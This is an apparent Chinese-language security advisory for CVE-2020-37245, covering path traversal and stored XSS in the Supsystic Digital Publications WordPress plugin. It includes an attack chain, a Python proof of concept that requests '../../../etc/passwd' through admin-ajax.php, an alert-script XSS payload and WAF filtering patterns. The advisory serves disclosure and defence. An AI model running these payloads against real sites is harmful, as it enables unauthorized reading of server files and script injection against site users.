CVE-2020-37245 CVSS 7.5 高危

CVE-2020-37245: Supsystic插件路径遍历与XSS漏洞

披露日期: 2026-05-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2020-37245

漏洞类型

路径遍历, 存储型XSS

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Supsystic Digital Publications (WordPress Plugin)

漏洞概述

Supsystic Digital Publications插件1.6.9版本存在严重安全漏洞。该插件在Folder输入字段中缺乏适当的过滤，导致路径遍历漏洞，攻击者可读取Web根目录之外的敏感文件。此外，插件在处理出版物设置时未能对Area Width和Publication Width等参数进行净化，引发存储型跨站脚本攻击，恶意脚本将在查看或编辑出版物时执行。这两个漏洞均无需认证即可利用，对网站安全构成严重威胁。

技术细节

该漏洞核心在于输入验证缺失。首先是路径遍历漏洞，位于Folder输入字段。插件未对用户输入进行严格的路径规范化和过滤，允许攻击者利用`../`等字符序列访问Web根目录之外的系统文件，导致敏感信息泄露。其次是存储型XSS漏洞，涉及Area Width和Publication Width参数。由于缺乏对特殊字符的转义处理，攻击者可注入恶意脚本。该脚本被存储后，会在用户查看或编辑相关出版物时自动执行。根据CVSS 3.1向量，该漏洞通过网络攻击，无需用户交互和权限即可利用，具有极高的攻击风险，可能导致服务器沦陷或用户数据被盗。

攻击链分析

STEP 1

侦察

攻击者识别目标网站是否安装了Supsystic Digital Publications插件且版本小于等于1.6.9。

STEP 2

路径遍历利用

攻击者向Folder输入字段发送包含“../”序列的恶意请求，尝试读取/etc/passwd或wp-config.php等敏感文件。

STEP 3

XSS注入

攻击者在出版物的Area Width或Publication Width设置中注入恶意JavaScript脚本，该脚本被存储在数据库中。

STEP 4

触发攻击

当管理员或普通用户访问受影响的出版物页面时，嵌入的恶意脚本在浏览器中执行，窃取Cookie或进行重定向。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2020-37245: Path Traversal & Stored XSS
# Target: Supsystic Digital Publications <= 1.6.9

# 1. Path Traversal PoC
def check_path_traversal(target_url):
    # Vulnerable endpoint example (admin-ajax.php is common in WP)
    endpoint = target_url + "/wp-admin/admin-ajax.php"
    # Payload to read /etc/passwd
    payload = {
        "action": "some_folder_action", # Replace with actual action name if known
        "folder": "../../../etc/passwd",
        "id": "1"
    }
    try:
        response = requests.post(endpoint, data=payload)
        if "root:" in response.text:
            print("[+] Path Traversal Vulnerability Confirmed!")
            print(response.text[:200])
        else:
            print("[-] Path Traversal not detected.")
    except Exception as e:
        print(f"Error: {e}")

# 2. Stored XSS PoC Payload
# Inject this into 'Area Width' or 'Publication Width' parameter
xss_payload = '"><script>alert("CVE-2020-37245_XSS")</script>'
print(f"XSS Payload to inject in settings: {xss_payload}")

# Usage
# check_path_traversal("http://target-site.com")

影响范围

Supsystic Digital Publications <= 1.6.9

防御指南

临时缓解措施

建议立即升级插件至最新版本以修复已知漏洞。若暂时无法升级，应通过Web应用防火墙（WAF）拦截包含“../”、“etc/passwd”或<script>等特征的恶意请求，并禁止非管理员用户访问插件设置页面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表